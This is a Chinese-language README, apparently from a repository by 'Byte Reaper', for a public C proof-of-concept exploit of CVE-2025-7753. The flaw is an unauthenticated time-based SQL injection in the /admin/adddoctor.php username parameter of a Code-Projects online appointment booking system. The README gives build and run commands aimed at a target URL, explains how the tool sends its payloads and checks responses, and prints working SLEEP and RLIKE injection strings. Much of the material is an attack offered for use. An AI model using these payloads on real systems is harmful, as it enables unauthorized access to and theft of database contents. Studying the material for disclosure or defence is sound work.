作者: Byte Reaper
Telegram: @ByteReaper0
CVE: CVE‑2025‑7753
漏洞类型: 未认证的基于时间的 SQL 注入
在 在线预约系统 1.0(Code‑Projects)中的 /admin/adddoctor.php 文件存在一个严重的 SQL 注入漏洞。username 参数未正确过滤,允许远程攻击者执行任意 SQL 查询(基于时间、基于错误、联合查询、布尔盲注)。
本仓库提供了 首个公开的 PoC,使用 C 语言编写,利用 libcurl 进行 HTTP 请求,并通过 ANSI 彩色输出提高可读性。
操作系统: Linux(推荐 x86_64)
编译器: GCC 或 Clang
依赖项:
sudo apt update sudo apt install build-essential libcurl4-openssl-dev
编译:
gcc exploit.c argparse.c -o CODE_PROJECT -lcurl
执行(需要 root 权限):
sudo ./CODE_PROJECT-7753 -u http://TARGET/Online-Appointment-Booking-System-master/
详细模式(可选):
sudo ./CODE_PROJECT -u http://TARGET/... -v
环境检查确保你正在 Linux 上以 root 身份运行(必要时通过 sudo 自动提权)。
载荷数组包含:
SLEEP(5))RLIKE、CONCAT、COUNT)libcurl 执行 POST 请求并捕获服务器响应。
响应解析会扫描 SQL 错误字符串,以确认漏洞存在。
11' AND (SELECT 9158 FROM (SELECT(SLEEP(5)))QYZI)-- LGFz 11' RLIKE (SELECT (CASE WHEN (1872=1872) THEN 11 ELSE 0x28 END))-- AfYm … 等等。
MIT